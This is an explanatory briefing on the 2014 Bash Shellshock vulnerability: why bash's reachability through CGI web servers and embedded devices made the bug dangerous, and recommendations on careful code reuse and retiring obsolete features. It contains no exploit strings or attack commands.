Cybercrime Centres of Excellence Network for Training, Research and Education The BASH Shellshock Bug Unintended Consequences in Reuse of Software 1 Introduction On September 24th , advisories were published concerning a bug in the Bourne Again SHell, bash [1]. This software is a command line interpreter for UNIX-like systems, and exists on many platforms, including end-user systems [2]. To make matters worse, bash is used by popular software such as the apache web server or OpenSSH, to provide extendability. To put things in perspective, the apache web server deploys about half of the web sites on the internet today [3]. Under certain conditions, attackers can force these legitimate services to execute arbitrary commands on the server. This started to happen very soon after publication of the vulnerability [4], and the bug is now used as vector to spread malware [5]. At the time of writing, systems administrators and web site operators are rushing to patch their systems. 2 The Problem (This section makes use of technical language) Bash was created 25 years ago to provide a versatile environment with which to administer UNIX systems. It provides scripting facilities that allow among other things the automation of common tasks. Parameters to scripts are often passed as environment variables. The content of these variables can be anything: the name of a file, a username, or even function definitions. In this particular case,the vulnerability lies in the fact that bash continued to process commands after the end of a function definition. More technical information about the problem is available online [6] and [7]. 3 Why is This Bad? 3.1 Widespread Usage The apache web server uses bash as engine for dynamic web pages, using the Common Gateway Interfaces protocol (CGI) as a means of communication [8]. Other software, for example mail servers, also use bash for back-end operations. The apache web server runs on about 50% of the web servers on the internet, but that is not the full story! Derivatives of apache and bash exist on countless devices as back-end for the administration interface: home routers, media players, Small-Office/Home Office SAN appliances, etc. There are millions of these devices in the field, often operated by people with little to no expertise in systems administration, and who have no idea that their device is offering this kind of service and is vulnerable, and even less know how to fix the problem. 3.2 Inappropriate Reuse Bash was never intended to be reachable online. The intent was rather that it is used locally or over trusted links by knowledgeable people to perform for example systems administration tasks. However, as already stated, the apache web server uses this feature to provide CGI pages (see Glossary), and this is only one of the most common uses: mail servers and countless other devices can pass commands to bash and might therefore be used as components of attack vectors.The result of this bundling is that a tool and in particular extended functionality that were meant to be used by trusted persons in trusted environments are reachable by anyone with an internet connection. The bug, which has little impact in the intended environment, can now have devastating effects. Most likely, the choice of bash as a mechanism to provide dynamic web pages was one of convenience rather than a carefully studied selection. Bash was already ubiquitous on systems where the web server could run, but the authors used it without caring for unnecessary features. 3.3 Obsolete Features The idea of allowing a web server to execute CGI scripts dates back to 1993 [9]. In the early days of the internet, CGI was the only way for a web site to provide dynamic pages. Since then, alternatives to CGI exist like servlets or ASP. These are more efficient and better integrated in the web server, and make for a more comfortable development environment. Nevertheless, the feature remains and there are many reasons for this: fear of breaking popular sites; difficulty of removing old code; failure to review the feature list, etc. 4 Recommendations 4.1 Think Before Reusing Reusing existing code and programs is a common development practice. Programmers are encouraged not to re-invent the wheel. However, they often reuse software without completely understanding the ramifications of the reuse, and without regard for unnecessary features in the reused software. Developers are under pressure to deliver faster, and have no time, no expertise, nor incentive to conduct proper review of reused code. This was also one of the underlying problems in the recent “Heartbleed” incident [8]. We recommend that any code reuse be the result of a thorough review and understanding of the reviewed code. Management must allow and encourage developers to take the time to perform this review, and developers must not only focus on speed and convenience. Unnecessary features should be stripped. Should that prove impossible or take too much time, then the code should not be reused, or any resulting risk consciously accepted. 4.2 Review Features The idea of allowing a web server to execute CGI scripts dates back to 1993 [9]. Since then, alternatives to CGI (such as servlets or ASP) exist. In general, these alternatives are more efficient and better integrated in the web server, and make for a more comfortable development environment. However the CGI feature still exists today, and there are many reasons for this: fear of breaking popular sites; difficulty of removing old code; failure to review the feature list, etc. We recommend providers of online services or infrastructure to regularly review the need to keep existing features in deployed software, and to plan for their removal when better alternatives exist. Product teams should not be afraid to deprecate old features, and even more when they prove to be dangerous.Glossary ASP (Active Server Page): Technology created by Microsoft to facilitate the development of web applications on their web server software CGI (Common Gateway Interface): The first mechanism that allowed a web server to return dynamic pages Command-Line Interpreter: A program that acts as text user interface for an Operating System Environment Variable: A named value that can be used in a script. Usage of the variable in a script will be replaced by its value. Servlet: Mechanism to extend the functionality of a web server in Java. Script: Small (usually) set of commands that automate tasks on a computer. UNIX: Operating System originally developed in the 70’s. Linux is one of the most popular variants
Posted on: Sun, 05 Oct 2014 00:39:10 +0000
Trending Topics
Recently Viewed Topics
© 2015